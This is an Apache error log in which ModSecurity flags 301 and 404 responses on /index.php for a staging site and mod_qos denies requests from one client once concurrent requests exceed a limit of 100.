[Tue May 26 19:59:11.293419 2026] [security2:error] [pid 93868:tid 94297] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuNUqK9k_ZUB2Vp25z3wAAAbY"]
[Tue May 26 19:59:11.300708 2026] [security2:error] [pid 93576:tid 93760] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuNWDRMqfxdEDkoszp_wAAADA"]
[Tue May 26 19:59:11.320725 2026] [security2:error] [pid 93576:tid 93793] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuNWDRMqfxdEDkoszqBAAAAFE"]
[Tue May 26 19:59:11.322502 2026] [security2:error] [pid 93868:tid 94325] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuNUqK9k_ZUB2Vp250AQAAAdI"]
[Tue May 26 19:59:11.337133 2026] [qos:error] [pid 93868:tid 94266] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuN0qK9k_ZUB2Vp250pwAAAZc
[Tue May 26 19:59:11.338927 2026] [security2:error] [pid 93868:tid 94374] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuNUqK9k_ZUB2Vp25z9QAAAgM"]
[Tue May 26 19:59:11.344722 2026] [security2:error] [pid 93868:tid 94301] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuNUqK9k_ZUB2Vp250CAAAAbo"]
[Tue May 26 19:59:11.345941 2026] [security2:error] [pid 93576:tid 93784] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuNWDRMqfxdEDkoszqDQAAAEg"]
[Tue May 26 19:59:11.352131 2026] [security2:error] [pid 93868:tid 94379] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuNUqK9k_ZUB2Vp25z-AAAAgg"]
[Tue May 26 19:59:11.353113 2026] [security2:error] [pid 93868:tid 94286] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuNUqK9k_ZUB2Vp250BwAAAas"]
[Tue May 26 19:59:11.357173 2026] [security2:error] [pid 93868:tid 94373] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuNUqK9k_ZUB2Vp250DAAAAgI"]
[Tue May 26 19:59:11.358906 2026] [security2:error] [pid 93868:tid 94265] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuNUqK9k_ZUB2Vp25z_QAAAZY"]
[Tue May 26 19:59:11.375519 2026] [security2:error] [pid 93868:tid 94304] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuNkqK9k_ZUB2Vp250NgAAAb0"]
[Tue May 26 19:59:11.376799 2026] [security2:error] [pid 93576:tid 93800] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuNWDRMqfxdEDkoszqCQAAAFg"]
[Tue May 26 19:59:11.383720 2026] [security2:error] [pid 93576:tid 93817] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuNWDRMqfxdEDkoszqDwAAAGk"]
[Tue May 26 19:59:11.384808 2026] [security2:error] [pid 93868:tid 94284] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuNkqK9k_ZUB2Vp250NAAAAak"]
[Tue May 26 19:59:11.387166 2026] [security2:error] [pid 93576:tid 93794] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuNmDRMqfxdEDkoszqUgAAAFI"]
[Tue May 26 19:59:11.387884 2026] [security2:error] [pid 93868:tid 94309] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuNkqK9k_ZUB2Vp250RgAAAcI"]
[Tue May 26 19:59:11.387996 2026] [security2:error] [pid 93576:tid 93775] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuNmDRMqfxdEDkoszqQQAAAD8"]
[Tue May 26 19:59:11.402841 2026] [security2:error] [pid 93868:tid 94331] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuNkqK9k_ZUB2Vp250SgAAAdg"]
[Tue May 26 19:59:11.404882 2026] [security2:error] [pid 93576:tid 93755] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuNmDRMqfxdEDkoszqTAAAACs"]
[Tue May 26 19:59:11.418470 2026] [security2:error] [pid 93576:tid 93757] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuNmDRMqfxdEDkoszqVwAAAC0"]
[Tue May 26 19:59:11.423616 2026] [security2:error] [pid 93868:tid 94319] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuNkqK9k_ZUB2Vp250NwAAAcw"]
[Tue May 26 19:59:11.428892 2026] [security2:error] [pid 93868:tid 94264] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuNkqK9k_ZUB2Vp250RQAAAZU"]
[Tue May 26 19:59:11.558389 2026] [qos:error] [pid 93868:tid 94264] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuN0qK9k_ZUB2Vp2501wAAAZU
[Tue May 26 19:59:11.560161 2026] [qos:error] [pid 93576:tid 93728] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuN2DRMqfxdEDkoszqrAAAABA
[Tue May 26 19:59:11.562956 2026] [qos:error] [pid 93868:tid 94317] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuN0qK9k_ZUB2Vp2502QAAAco
[Tue May 26 19:59:11.566839 2026] [qos:error] [pid 93868:tid 94287] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuN0qK9k_ZUB2Vp2502gAAAaw
[Tue May 26 19:59:11.567653 2026] [qos:error] [pid 93868:tid 94263] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuN0qK9k_ZUB2Vp2502wAAAZQ
[Tue May 26 19:59:11.568298 2026] [qos:error] [pid 93868:tid 94357] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuN0qK9k_ZUB2Vp2503gAAAfI
[Tue May 26 19:59:11.568426 2026] [qos:error] [pid 93868:tid 94301] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuN0qK9k_ZUB2Vp2503QAAAbo
[Tue May 26 19:59:11.590091 2026] [qos:error] [pid 93868:tid 94355] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuN0qK9k_ZUB2Vp2504wAAAfA
[Tue May 26 19:59:11.591405 2026] [qos:error] [pid 93868:tid 94343] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuN0qK9k_ZUB2Vp2505QAAAeQ
[Tue May 26 19:59:11.605496 2026] [qos:error] [pid 93868:tid 94317] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuN0qK9k_ZUB2Vp2506wAAAco
[Tue May 26 19:59:11.892235 2026] [security2:error] [pid 93576:tid 93789] [client 113.163.166.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWuN2DRMqfxdEDkoszqmQAAAE0"]
[Tue May 26 19:59:12.151532 2026] [security2:error] [pid 93576:tid 93825] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWuN2DRMqfxdEDkoszqvQAAAHE"]
[Tue May 26 19:59:12.285496 2026] [security2:error] [pid 93868:tid 94324] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuNkqK9k_ZUB2Vp250SAAAAdE"]
[Tue May 26 19:59:12.285875 2026] [security2:error] [pid 93576:tid 93809] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuNmDRMqfxdEDkoszqUAAAAGE"]
[Tue May 26 19:59:12.288534 2026] [security2:error] [pid 93868:tid 94268] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuNkqK9k_ZUB2Vp250WgAAAZk"]
[Tue May 26 19:59:12.293907 2026] [security2:error] [pid 93868:tid 94312] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuNkqK9k_ZUB2Vp250WQAAAcU"]
[Tue May 26 19:59:12.295966 2026] [security2:error] [pid 93868:tid 94320] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuNkqK9k_ZUB2Vp250XAAAAc0"]
[Tue May 26 19:59:12.297116 2026] [security2:error] [pid 93868:tid 94339] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuNkqK9k_ZUB2Vp250XwAAAeA"]
[Tue May 26 19:59:12.297396 2026] [security2:error] [pid 93868:tid 94314] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuNkqK9k_ZUB2Vp250VwAAAcc"]
[Tue May 26 19:59:12.298441 2026] [security2:error] [pid 93868:tid 94295] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuNkqK9k_ZUB2Vp250UgAAAbQ"]
[Tue May 26 19:59:12.299811 2026] [security2:error] [pid 93868:tid 94328] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuNkqK9k_ZUB2Vp250TAAAAdU"]
[Tue May 26 19:59:12.301063 2026] [security2:error] [pid 93576:tid 93807] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuNmDRMqfxdEDkoszqWAAAAF8"]
[Tue May 26 19:59:12.310617 2026] [security2:error] [pid 93868:tid 94347] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuNkqK9k_ZUB2Vp250XQAAAeg"]
[Tue May 26 19:59:12.320578 2026] [security2:error] [pid 93868:tid 94345] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuNkqK9k_ZUB2Vp250WAAAAeY"]
[Tue May 26 19:59:12.321424 2026] [security2:error] [pid 93576:tid 93829] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuNmDRMqfxdEDkoszqYwAAAHU"]
[Tue May 26 19:59:12.328495 2026] [security2:error] [pid 93868:tid 94384] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuNkqK9k_ZUB2Vp250VAAAAg0"]
[Tue May 26 19:59:12.346749 2026] [security2:error] [pid 93868:tid 94271] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuNkqK9k_ZUB2Vp250ZwAAAZw"]
[Tue May 26 19:59:12.347064 2026] [security2:error] [pid 93868:tid 94376] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuNkqK9k_ZUB2Vp250ZgAAAgU"]
[Tue May 26 19:59:12.348259 2026] [security2:error] [pid 93868:tid 94315] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuNkqK9k_ZUB2Vp250aAAAAcg"]
[Tue May 26 19:59:12.350531 2026] [security2:error] [pid 93868:tid 94354] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuNkqK9k_ZUB2Vp250cwAAAe8"]
[Tue May 26 19:59:12.356451 2026] [security2:error] [pid 93868:tid 94349] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuNkqK9k_ZUB2Vp250agAAAeo"]
[Tue May 26 19:59:12.357857 2026] [security2:error] [pid 93868:tid 94316] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuNkqK9k_ZUB2Vp250bQAAAck"]
[Tue May 26 19:59:12.359423 2026] [security2:error] [pid 93868:tid 94366] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuNkqK9k_ZUB2Vp250dQAAAfs"]
[Tue May 26 19:59:12.366115 2026] [security2:error] [pid 93576:tid 93779] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuN2DRMqfxdEDkoszqjgAAAEM"]
[Tue May 26 19:59:12.377549 2026] [security2:error] [pid 93576:tid 93713] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuNmDRMqfxdEDkoszqZQAAAAE"]
[Tue May 26 19:59:12.377638 2026] [security2:error] [pid 93576:tid 93791] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuN2DRMqfxdEDkoszqkAAAAE8"]
[Tue May 26 19:59:12.379572 2026] [security2:error] [pid 93868:tid 94308] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuNkqK9k_ZUB2Vp250awAAAcE"]
[Tue May 26 19:59:12.383476 2026] [security2:error] [pid 93576:tid 93758] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuNmDRMqfxdEDkoszqZAAAAC4"]
[Tue May 26 19:59:12.388738 2026] [security2:error] [pid 93576:tid 93787] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuN2DRMqfxdEDkoszqkwAAAEs"]
[Tue May 26 19:59:12.408232 2026] [security2:error] [pid 93868:tid 94351] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuN0qK9k_ZUB2Vp250qQAAAew"]
[Tue May 26 19:59:12.410775 2026] [security2:error] [pid 93868:tid 94382] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuN0qK9k_ZUB2Vp250wwAAAgs"]
[Tue May 26 19:59:12.412646 2026] [security2:error] [pid 93868:tid 94309] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuN0qK9k_ZUB2Vp250wgAAAcI"]
[Tue May 26 19:59:12.440325 2026] [security2:error] [pid 93868:tid 94286] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuN0qK9k_ZUB2Vp2501AAAAas"]
[Tue May 26 19:59:12.443677 2026] [security2:error] [pid 93576:tid 93838] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuN2DRMqfxdEDkoszqlQAAAH4"]
[Tue May 26 19:59:12.444363 2026] [security2:error] [pid 93868:tid 94261] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuN0qK9k_ZUB2Vp250qwAAAZI"]
[Tue May 26 19:59:12.596304 2026] [qos:error] [pid 93576:tid 93759] [client 45.148.10.120:35204] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuOGDRMqfxdEDkoszrBgAAAC8
[Tue May 26 19:59:12.597710 2026] [qos:error] [pid 93576:tid 93714] [client 45.148.10.120:35240] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuOGDRMqfxdEDkoszrCAAAAAI
[Tue May 26 19:59:12.599737 2026] [qos:error] [pid 93576:tid 93783] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuOGDRMqfxdEDkoszrDwAAAEc
[Tue May 26 19:59:12.600118 2026] [qos:error] [pid 93576:tid 93803] [client 45.148.10.120:35186] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuOGDRMqfxdEDkoszrEQAAAFs
[Tue May 26 19:59:12.600653 2026] [qos:error] [pid 93576:tid 93829] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuOGDRMqfxdEDkoszrEAAAAHU
[Tue May 26 19:59:12.604709 2026] [qos:error] [pid 93868:tid 94355] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuOEqK9k_ZUB2Vp251OgAAAfA
[Tue May 26 19:59:12.604716 2026] [qos:error] [pid 93868:tid 94353] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=50.87.254.159, id=ahWuOEqK9k_ZUB2Vp251OwAAAe4
[Tue May 26 19:59:12.604854 2026] [qos:error] [pid 93868:tid 94313] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuOEqK9k_ZUB2Vp251PAAAAcY
[Tue May 26 19:59:12.605297 2026] [qos:error] [pid 93868:tid 94372] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuOEqK9k_ZUB2Vp251OQAAAgE
[Tue May 26 19:59:12.605647 2026] [qos:error] [pid 93576:tid 93757] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuOGDRMqfxdEDkoszrFgAAAC0
[Tue May 26 19:59:12.747984 2026] [qos:error] [pid 93576:tid 93791] [client 45.148.10.120:35204] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuOGDRMqfxdEDkoszrGgAAAE8
